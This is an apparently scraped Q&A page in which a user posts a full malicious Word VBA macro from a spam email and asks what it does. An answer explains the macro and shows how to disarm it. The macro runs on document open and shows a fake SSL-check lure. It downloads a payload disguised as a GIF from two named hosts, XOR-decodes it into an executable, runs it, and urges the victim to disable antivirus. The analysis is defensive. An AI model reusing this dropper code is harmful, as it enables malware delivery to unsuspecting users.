Clever Geek Handbook

The spammer / attacker / bad person sent a MS Word document containing a large macro. Can anyone understand what this macro does?

An example context to allow a stack over stream to post this question.

Here he tries to combine his work with poppy and windows, I suppose.

#If VBA7 And Win64 Then
Private Declare PtrSafe Function Du9sahjjfje Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As LongLong
Private Declare PtrSafe Function Uhdwuud Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare PtrSafe Function Uhduiuwd Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
Private Declare PtrSafe Function Gshwjf Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Private Declare Function Du9sahjjfje Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As Long
Private Declare Function Uhdwuud Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare Function Uhduiuwd Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
Private Declare Function Gshwjf Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If

this attacker appears to be opening this document.

Sub Document_Open()

Dim wyqud As String
Dim zdwie As Long
Dim rufhd As Long
Dim bldos As Integer
Dim mufid() As Byte

#If Win64 Then
Dim kmvbf As LongLong
#Else
Dim kmvbf As Long
#End If

What does it do?

ActiveDocument.Content.Delete
ActiveDocument.PageSetup.LeftMargin = 240
ActiveDocument.PageSetup.TopMargin = 100

Set myRange = ActiveDocument.Content

With myRange.Font
 .Name = "Verdana"
 .Size = 14
End With

ActiveDocument.Range.Text = "Check SSL certificate." & vbLf & "     Please wait..."

Is this supposed to damage my computer?

DoEvents
DoEvents
DoEvents
DoEvents

wyqud = lwyfu
zdwie = Gshwjf(0, "http://adenzia.ch/_vti_cnf/bug.gif", wyqud, 0, 0)
rufhd = FileLen(wyqud)

If zdwie <> 0 And rufhd < 152143 Then
zdwie = Gshwjf(0, "http://kingofstreets.de/class/meq.gif", wyqud, 0, 0)
rufhd = FileLen(wyqud)
End If


If rufhd < 154743 Then
ActiveDocument.Content.Delete
MsgBox "No internet access. Turn off any firewall or anti-virus software and try again.", vbCritical, "Error"
Exit Sub
End If

bldos = FreeFile
Open wyqud For Binary As #bldos
ReDim mufid(0 To LOF(bldos) - 1)
Get #bldos, , mufid()
Close #bldos

Call duwif(mufid())

Don't know what it does

wyqud = Left(wyqud, Len(wyqud) - 3)
wyqud = wyqud & "exe"

bldos = FreeFile
Open wyqud For Binary As #bldos
Put #bldos, , mufid()
Close #bldos


kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)

ActiveDocument.Content.Delete
MsgBox "The file is corrupted and cannot be opened", vbCritical, "Error"

End Sub

skillfully written unreadable code.

Public Function lwyfu() As String
  Dim djfie As String * 512
  Dim pwifu As String * 576
  Dim dwuf As Long
  Dim wefkg As String
  dwuf = Uhdwuud(512, djfie)
  If (dwuf > 0 And dwuf < 512) Then
    dwuf = Uhduiuwd(djfie, 0, 0, pwifu)
    If dwuf <> 0 Then
        wefkg = Left$(pwifu, InStr(pwifu, vbNullChar) - 1)
    End If
    lwyfu = wefkg
  End If
End Function

another function

Public Sub duwif(mufid() As Byte)
  Dim dfety As Long
  Dim bvjwi As Long
  Dim wbdys As Long
  Dim dvywi(256) As Byte
  Dim wdals As Long
  Dim dwiqh As Long


  bvjwi = UBound(mufid) + 1

  For dfety = 10 To 265
    dvywi(dfety - 10) = mufid(dfety)
  Next

  wdals = UBound(dvywi) + 1

  dwiqh = 0
  For dfety = 266 To (bvjwi - 267)
    mufid(dfety - 266) = mufid(dfety) Xor dvywi(dwiqh)
    dwiqh = dwiqh + 1

    If dwiqh = (wdals - 1) Then
        dwiqh = 0
    End If
  Next

  ReDim Preserve mufid(bvjwi - 267)

End Sub

end of macro

+3


source to share


1 answer


The comments are correct; the macro downloads malware / spyware and executes it.

It tries to use both GIF URLs (and even prompts the user to turn off their firewall / AV if download fails). The two GIFs are identical (same SHA256 checksum), they have a matching GIF header block ("GIF89a"), and they even have some bytes describing what the image data should be.

The macro uses a subroutine duwif()

(line 105) to extract the executable binary from the loaded GIF. It stores the binary in a temporary file, which is referenced by the function lwyfu()

(line 90).

Then the macro runs on line 82:

kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)

You can modify the macro to remove / comment the execution statement and insert something harmless. For example:



REM kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)
MsgBox wyqud

This opens a message box with the path to the extracted binary instead of executing it.

Binary checksum (SHA256)

55f4cc0f9258efc270aa5e6a3b7acde29962fe64b40c2eb36ef08a7a1369a5bd

Several antivirus providers mark this file as malware, and automatic analysis reveals some suspicious activity.

+1


source






More articles:


All Articles